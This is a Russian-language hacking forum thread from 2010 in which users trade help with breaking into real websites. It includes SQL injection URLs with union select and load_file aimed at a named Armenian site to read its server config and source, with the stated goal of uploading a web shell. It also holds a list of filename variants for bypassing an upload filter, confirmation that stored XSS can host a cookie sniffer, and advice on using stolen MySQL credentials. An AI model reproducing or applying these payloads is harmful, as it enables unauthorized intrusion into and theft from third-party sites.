05.03.2010, 23:27
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Pashkela
просто брутить, известными программами или своим скриптом *тулза умеет, только для винды там словарь говеный*
Паша, тебе лишь-бы логи засрать своей чудо программой.
Ну сколько-же тебя просить не учить людей всякой херне =\
LokbatanLi
http://www.mission.am/am/past/program.php?ID=-1+union+select+1,load_file('C:/Program Files/Apache Group/Apache2/conf/httpd.conf'),3,4,5,6,7,8,9,10,11,12+from+mysql.use r
ServerName mission.am
DocumentRoot htdocs/mission
http://www.mission.am/am/past/program.php?ID=-1+union+select+1,load_file('C:/Program Files/Apache Group/Apache2/htdocs/mission/index.php'),3,4,5,6,7,8,9,10,11,12+from+mysql.user
PS Если там "случайно" окажется дефейс от турецких хакеров, ты тут больше советов не проси пожалуйста
|
|
|
06.03.2010, 07:30
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
Сообщение от Jokester
Паша, тебе лишь-бы логи засрать своей чудо программой.
Ну сколько-же тебя просить не учить людей всякой херне =\
LokbatanLi
http://www.mission.am/am/past/program.php?ID=-1+union+select+1,load_file('C:/Program Files/Apache Group/Apache2/conf/httpd.conf'),3,4,5,6,7,8,9,10,11,12+from+mysql.use r
http://www.mission.am/am/past/program.php?ID=-1+union+select+1,load_file('C:/Program Files/Apache Group/Apache2/htdocs/mission/index.php'),3,4,5,6,7,8,9,10,11,12+from+mysql.user
PS Если там "случайно" окажется дефейс от турецких хакеров, ты тут больше советов не проси пожалуйста
net ne za defeysom sprasu..
prosto ne moqu nayti path shtobi shell zalivat ??
a dalse kto pomojet ??
|
|
|
|
06.03.2010, 10:09
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от LokbatanLi
net ne za defeysom sprasu..
prosto ne moqu nayti path shtobi shell zalivat ??
a dalse kto pomojet ??
Тебе ж дали путь.
На всякий случай почитай http://forum.antichat.ru/thread104591.html
|
|
|
|
06.03.2010, 12:21
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
Помогтье загрузить шелл!Грузятся только изображния!остальное просто режется.
файл типа shell.php режется к виду [какое либо число] без расширения
т.е. shell.php будет подимене 8 без расширения
shell.php.php
shell.php%00.jpg
.htaccess не катят
|
|
|
|
06.03.2010, 12:24
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
shell.php3
shell.phtml
shell.php3.php
shell.phtml.php
shell.pHp
shell.PHTmL
|
|
|
|
06.03.2010, 12:35
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
wildshaman спс за ответ! какойто из способов помог!! оказалось зря шелл грузил и парился ((( очень суровые там условия!
|
|
|
|
06.03.2010, 13:13
|
|
Участник форума
Регистрация: 13.01.2008
Сообщений: 125
Провел на форуме:
207131
Репутация:
0
|
|
если я в каком либо чате нашёл XSS которая реагирует когда выполняется код (ппросмотр чата)
то могу ли я туда сниффер поставить ?
|
|
|
|
06.03.2010, 13:22
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от Tapaceuka
если я в каком либо чате нашёл XSS которая реагирует когда выполняется код (ппросмотр чата)
то могу ли я туда сниффер поставить ?
Да. Это называется активная XSS.
|
|
|
|
06.03.2010, 18:45
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
есть пароль и логин о мускуля сайта. можно ли подключиться к нему? какой клиент посоветуете?
phpmyadmin на сайте нет, через веб-интерфейс никак...
|
|
|
|
06.03.2010, 19:22
|
|
Участник форума
Регистрация: 18.04.2009
Сообщений: 120
Провел на форуме:
435863
Репутация:
80
|
|
есть пароль и логин о мускуля сайта. можно ли подключиться к нему? какой клиент посоветуете?
phpmyadmin на сайте нет, через веб-интерфейс никак...
Всё зависит от пользователя MySQL. Если имя <имя>@localhost, то это значит, что удаленно подключится никак нельзя, лишь с локальной машины (если не ошибаюсь, то root@localhost - исключение. К нему можно подключаться удаленно). В таком случае можно только через шелл на сайте.
Есть много хороших статей. Гугли "удаленное подключение MySQL". Самая первая неплохая.
Последний раз редактировалось Sams; 06.03.2010 в 19:25..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
